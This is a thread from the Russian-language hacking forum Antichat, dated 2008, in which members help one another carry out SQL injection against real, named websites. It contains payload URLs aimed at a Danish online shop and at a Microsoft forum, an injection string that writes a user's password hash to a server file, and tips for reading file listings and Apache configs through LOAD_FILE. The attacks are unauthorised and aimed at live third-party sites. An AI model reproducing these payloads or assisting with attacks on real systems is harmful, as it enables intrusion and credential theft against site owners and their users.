ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

06.12.2008, 00:13
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от desTiny
InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
https://forum.antichat.ru/showthread.php?t=49775
|
|
|

06.12.2008, 00:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\
https://forum.antichat.ru/thread79411.html
|
|
|

06.12.2008, 00:32
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме: 110445
Репутация:
1
|
|
hi
sorry for english
is this hackable
http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769
waitting>>>>>>>>>>>
|
|
|

06.12.2008, 00:38
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме: 203452
Репутация:
36
|
|
http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!
-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!
Последний раз редактировалось BanQui; 06.12.2008 в 00:44..
|
|
|

06.12.2008, 02:00
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 8
Провел на форуме: 41669
Репутация:
1
|
|
блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать
во что пишу
' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua
а прочитать терь как, хз
на ошибки гуглил, нету
Последний раз редактировалось InvisibleSM; 06.12.2008 в 02:06..
|
|
|

06.12.2008, 03:00
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
[QUOTE=DimOnOID]а)Если только фряха если я не ошибаюсь...
насчёт б согласен..можно ещё поискать на сайте раскрытие путей....ну или погуглить этот сайт на ошибки ...насчтё конфигов вот темка
/QUOTE]
У мя конфиги не читались на фряшке =_=,точнее,на двух.Пад рутом...
|
|
|

06.12.2008, 06:11
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме: 120981
Репутация:
1
|
|
Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'
Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?
|
|
|

06.12.2008, 07:11
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
http://www.viper-shop.dk/category.php?id=180+and+1=1
интересно что же ты перепробовал... Не знаешь - не лезь или учись...
|
|
|

06.12.2008, 07:21
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
Сообщение от o3,14um
http://www.viper-shop.dk/category.php?id=180+and+1=1
интересно что же ты перепробовал... Не знаешь - не лезь или учись...
чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..
Последний раз редактировалось 159932; 06.12.2008 в 07:24..
|
|
|

06.12.2008, 07:46
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме: 3629857
Репутация:
504
|
|
Сообщение от o3,14um
http://www.viper-shop.dk/category.php?id=180+and+1=1
интересно что же ты перепробовал... Не знаешь - не лезь или учись...
ну тогда зайди и посмотри вывод
http://www.viper-shop.dk/category.php?id=180+and+1=1
и
http://www.viper-shop.dk/category.php?id=180+and+1=0
отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|